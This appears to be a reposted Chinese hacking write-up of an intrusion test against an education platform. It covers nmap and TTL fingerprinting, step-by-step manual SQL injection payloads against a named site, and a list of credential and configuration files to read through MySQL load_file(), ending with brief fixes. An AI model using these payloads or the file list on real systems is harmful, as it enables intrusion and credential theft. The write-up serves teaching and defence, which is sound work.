记一次Linux系统PHP注入入侵检测

admin

题记：
0 j2 c& l: t6 u3 T9 C8 }0 t7 ]一位朋友在某教育公司，一套网络教育平台。一年前，在2008年8月份的时候，我看到了这套平台，当时发现了个注入漏洞，测试了一下，得到一个可用帐户后就没有再继续下去。今天7月，又说到此事，我决定继续下去……
3 y! L5 Z3 Q8 H* N" |1 L第一步：获取需要的信息
' V0 O- V. P  e5 f+ X由于之前测试过，知道此系统某处存在SQL注入漏洞。但由于时隔一年，岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址，现在需要重新收集服务器有用信息。
注：以下为保护特用XXX代替敏感信息
$ \) @* s0 c8 q) r# O3 p1 p* B6 r顺手先PING了一下他们的域名：
# o& S  J& W0 O+ X; Aping XXX.XXX.XXX.XXX（本文约定：用XXX.XXX.XXX.XXX代表测试IP和域名）
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
顺便了解一下TTL，学好基础知识才能一路顺风：
( U7 Q% n: y  P# K" mTTL：(Time To Live ) 生存时间
5 o" S# k& Y6 ]指定数据包被路由器丢弃之前允许通过的网段数量。
TTL 是由发送主机设置的，以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时，要求路由器至少将 TTL 减小 1。
使用PING时涉及到的 ICMP 报文类型
, S% p4 @9 v4 S. z一个为ICMP请求回显（ICMP Echo Request）
一个为ICMP回显应答（ICMP Echo Reply）
  [$ n3 f! U- A, d/ @TTL 字段值可以帮助我们识别操作系统类型。
/ Y4 D5 u& m  p- }UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
+ R5 E" _! e  W: t/ p' nCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
  I  K- [0 I. ~' \微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
+ u" F0 J8 Z  i, j2 i. m& C( b) G微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
1 n$ l7 W+ [3 ]9 ]5 ?当然，返回的TTL值是相同的
但有些情况下有所特殊
0 h4 Y: ^+ `- P& a& D: |6 FLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
( V9 h3 y% @8 kFreeBSD 4.1, 4.0, 3.4;
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
OpenBSD 2.6, 2.7,
; F* a& w0 C( ?: _NetBSD
HP UX 10.20
ICMP 回显应答的 TTL 字段值为 255
" A$ e2 f9 W$ m1 b7 v6 i; ]Windows 95/98/98SE
) ?2 l! h3 B0 ?2 r6 `Windows ME
( z7 P3 g6 G8 `3 r% h1 Q# i: D/ nICMP 回显应答的 TTL 字段值为 32
: K0 ]" s# ?. L" HWindows NT4 WRKS
0 k3 _1 `) ^2 S& Z* @- dWindows NT4 Server
Windows 2000
6 Z/ D# D2 d- E& P# T1 ]Windows XP
' F) c6 ~) P, aICMP 回显应答的 TTL 字段值为 128
这样，我们就可以通过这种方法来辨别操作系统
+ E# I0 N; a8 L+ p4 BTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值，其数据就是默认的TTL值了，我们可以修改，但不能大于十进制的255
用NMAP扫描一下：
nmap -sT -O XXX.XXX.XXX.XXX
: F8 L" |, ^; C, O9 z# L. m如果没有装WinPcap则会弹出提示：
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
% Y4 f$ ~% x$ c+ Tade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
( j7 N  r2 A/ f: j' x- F+ G4 a) mode — Nmap may not function completely
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
! u/ A- [# I7 ^% |# cersions, you may be able to take iphlpapi.dll from another system and place it i
( o/ t: _+ I$ ^; j# Z1 V+ ^n your system32 dir (e.g. c:\windows\system32).
QUITTING!
到这里下载： http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
1 L7 {# s- v( b, z) l# P安装后继续执行刚才的命令，等待扫描完毕后得到入下信息：
Interesting ports on XXX.XXX.XXX.XXX:
- \3 Q" k: C7 E0 ~Not shown: 986 closed ports
5 C' i: n* n/ ]" p' fPORT     STATE    SERVICE
- X1 ^* s2 d0 O- r- J( ^21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
, C3 v% b8 }1 q* U80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
7 Z6 Y/ ^0 p& M2 U+ F5 W445/tcp  filtered microsoft-ds
513/tcp  open     login
) q) v9 O9 t6 N+ j514/tcp  open     shell
( _. Q8 F/ o9 b8 Q; J+ r& {/ i2 \593/tcp  filtered http-rpc-epmap
( X7 l' K# a5 [% v$ L; y1720/tcp filtered H.323/Q.931
1 P, }7 e4 }+ j! X$ b3306/tcp open     mysql
4444/tcp filtered krb524
% Q# L' w7 h" E1 m, jDevice type: WAP
Running: Linux 2.4.X
" W+ J9 \  f5 V9 E2 k1 j* tOS details: DD-WRT (Linux 2.4.35s)
Network Distance: 13 hops
0 g: b' N: S* i3 T+ E8 v看到SSH22端口是开着的，打开putty试一下，看是否可以正常连接：
" u# F6 G) D/ L5 v! w4 a8 Ulogin as:
- x2 n  Q# H7 O4 n2 w, \5 qTelnet23端口也是开着的，用telnet 命令链接一下：
$ }+ ^7 d, z5 C: w& i6 r7 btelnet XXX.XXX.XXX.XXX
提示：
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
Kernel 2.6.18-92.el5PAE on an i686
login:
& b+ p5 Y+ ?3 P7 N获取HTTP头信息：
在本地执行如下PHP代码
# z9 o& A. {4 m/ U  W<?php
& E3 e* Y, V  `8 ~6 F' g& A0 C4 p$url = ‘XXX.XXX.XXX.XXX’;
print_r(get_headers($url));
print_r(get_headers($url, 1));
4 c- C. k$ |' o3 g1 u: M?>
3 b& A0 y: z3 ~: N) G+ A将以上代码保存为PHP文件，执行：
. A- m/ _' I3 T6 H: t3 @9 _Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
+ ~, i; e8 O& z0 s2 ^8 A现在可以得出结论：
2 a. i1 X3 w' U, ~: e系统版本：Red Hat Enterprise Linux Server release 5.2 (Tikanga)
+ B: \- W, l$ U3 H- p' o/ X内核版本：Kernel 2.6.18-92.el5PAE on an i686
" @" x4 H' |  sWEB服务器版本：nginx/0.7.61
. ]4 a8 H0 u! c5 }. |第二步，开始测试寻找漏洞
分析是否存在注入漏洞，因为上次曾发现存在过，所以注入则是我们的首选。
1、敏感地址：站内存在有类似：http://www.fovweb.com/XXX.php?id=123 这种地址，属动态传参的
: R- G, w% a4 P& f4 H; P2、测试方法：在地址后加 and 1=1 和 and 1=2 测试
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
. q' G' W, W4 x9 c* shttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
恭喜，两次返回结果不同，则很有可能存在未过滤敏感字符而存在SQL注入漏洞，我们继续
! d0 ~- [0 v0 G$ P+ V0 l7 g& V" ~* ~3、手工注入：
注入也应该有个思路，不能随便碰运气，要记住入侵检测不是靠运气而走下去的，要靠的是清晰的思路、过硬的技术、很全的知识面。
3.1 猜测当前表字段数
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
% @% y2 J' G$ T+ B9 ?6 |此处猜测有个简单的算法，都是有技巧的吗，呵呵
. w3 V+ ]% _2 v; }( k- l算法简单如下：
第一步：根据页面信息，大概估算一个数值，这个是要靠一定的经验了；
1 Z% c# T. T8 B$ s; A" v第二步：取中算法，好比是10，如果返回错误，则取中间值5进行下一次猜测；
! m! I. F5 U* P; E需要注意：如果所选数值在字段数范围内即小于等于，则会（返回正常）；如果所选数值在字段范围外即大于等于，则会（返回错误）。
. Z& P& x  O# f4 `+ `8 a! D7 j以此来判断，是否过界，配合取中算法猜出字段数。
/ Y) p# e1 K3 f3 y举例：
6 ~. B, a7 R/ {; l7 I" _http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
* w/ X4 C- F' M. yhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
此时3则为我们要找的字段数。
- T, V$ e& _9 m  i; E& P3.2 配合union联合查询字段在页面所位置
我们已经知道了字段数为3，此时则可以做如下操作：
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
" T% h* [0 L; C  I7 G
这样就可以测试到哪些字段在页面上有所显示了，如图：

3.3 查敏感信息
这也是个思路问题，我们需要什么，其实到了这一步已经能做什么多事情了。
0 p, O# z8 W5 i. t! P; V" phttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
3.3.1 先查数据库用户、数据库名，以备后用，如图：

% b- }: ]# Y1 j& ^) V3 s得到数据库用户为root、数据库名为DBxx；
3.3.2 查配置文件
查配置文件，就是指查看系统敏感的文件，如web服务器配置文件等。
查看文件有一定的条件限制：
欲读取文件必须在服务器上
必须指定文件完整的路径
必须有权限读取并且文件必须完全可读
) c% ^4 C" z1 a+ @4 Q! z  r欲读取文件必须小于 max_allowed_packet
MYSQL注入中，load_file()函数在获得webshell以及提权过程中起着十分重要的作用，常被用来读取各种配置文件。
常用的一些：
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
5 m; I/ u8 z9 I. x* |/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
& q" U4 E1 n: R* y& b/etc/rsyncd.conf //同步程序配置文件
# b- b7 p& u' F* u0 v( e$ D/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
$ T. ^7 V' t) p2 ~& O* y* U: q/etc/my.cnf //mysql的配置文件
3 Y! e4 O) d0 w$ W$ Y9 b/etc/redhat-release //系统版本
( i3 D5 Q6 _5 w, d# o/etc/issue
2 @; m! E1 L, T/etc/issue.net
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
6 B1 |$ l" U; @6 q+ U. Uc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\my.ini //MYSQL配置文件
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
等等。实际上，load_file()的作用不止于此，它还可以用来读取系统中的二进制文件，
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
# {, [: q2 f8 {& S/ [% w% Cc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
1 U; t* s$ c" C( E  h! L//存储了pcAnywhere的登陆密码
4 z: J" a9 ~/ E) h6 h由于之前得到信息，此台服务器是采用的nginx做的Web服务器，那我们就来试着找一下nginx的安装路径吧。
+ F" g& F) N, O4 b+ j& U/ V2 ]这个没有技术性可言，纯靠经验和运气，由于很少用nginx不了解，我就先到网上搜索常用的安装路径，以及比较好的配置文档中的安装路径进行测试，最终，得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
最后：防范措施
+ `! p1 S7 F5 \! w1、修复PHP注入漏洞；
2、Mysql使用普通权限的用户；
, J! E# a+ f' k( m0 \: A3、升级linux内核至最新版本；